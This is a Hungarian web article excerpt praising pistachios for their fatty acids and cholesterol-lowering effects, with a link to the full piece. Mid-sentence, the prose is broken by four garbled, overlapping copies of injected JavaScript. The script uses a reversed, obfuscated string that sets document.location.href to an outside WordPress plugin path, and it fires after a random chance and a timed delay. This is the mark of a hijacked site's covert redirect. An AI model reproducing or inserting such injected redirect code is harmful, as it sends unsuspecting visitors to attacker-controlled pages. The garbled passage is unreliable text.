Ki gondolná, hogy egy apró mag, nevezetesen a pisztácia mértéhez képest rengeteg jóságot képes magában rejteni? A szömörcefélék családjába tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozó növény elsősorban a mediterrán vidékeken terem meg, lombhullató fája nehezen fordul termőre: legalább nyolc év kell, mire az első magszüret megtörténhet. A pisztáciát többnyire sörkorcsolyaként fogyasztják, kevésbé közismert, hogy a héjjal ölelt mag rendkívül gazdag a legegészségesebb zsírsavakban: egyszeresen telítetlen ómega-3, és ómega-6 zsírsavakat tartalmaz. Azaz aki ezt fogyasztja, szíve és érrendszere védelmében is eszik. A mag összetevői ugyanis csökkentik a vér káros koleszterintartalmát, azaz az LDL koleszterinszintet. S ha ez nem lenne elég, mára több kutatás is megerősítette, hogy…
A cikk folytatódik: http://12csillagjegy.co.hu/felnott/2018/01/10/pisztacia-mint-afrodiziakum-.html
- Hirdetés -